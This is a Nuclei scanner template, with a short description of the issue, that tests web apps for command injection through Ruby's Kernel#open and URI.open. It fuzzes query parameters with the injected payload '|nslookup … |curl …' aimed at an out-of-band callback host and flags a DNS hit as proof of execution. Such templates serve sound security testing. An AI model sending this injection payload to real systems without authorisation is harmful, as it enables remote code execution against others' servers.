Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
PoC代码[已公开]
id: cmdi-ruby-open-rce
info:
name: Ruby Kernel#open/URI.open RCE
author: pdteam
severity: high
description: |
Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
reference:
- https://bishopfox.com/blog/ruby-vulnerabilities-exploits
- https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
metadata:
max-request: 1
tags: cmdi,oast,dast,blind,ruby,rce,vuln
variables:
marker: "{{interactsh-url}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
stop-at-first-match: true
payloads:
interaction:
- "|nslookup {{marker}}|curl {{marker}}"
fuzzing:
- part: query
fuzz:
- "{{interaction}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4b0a00483046022100d92df5db8aad5337f3bfd5b6b74ac56650ed4b46a01670f2cc17edfc482eebf70221008653513ecb252e26cbc2c9a2b34a6a150f3017f6eaff6568a00626ac7a8c64f4:922c64590222798bb761d5b6d8e72950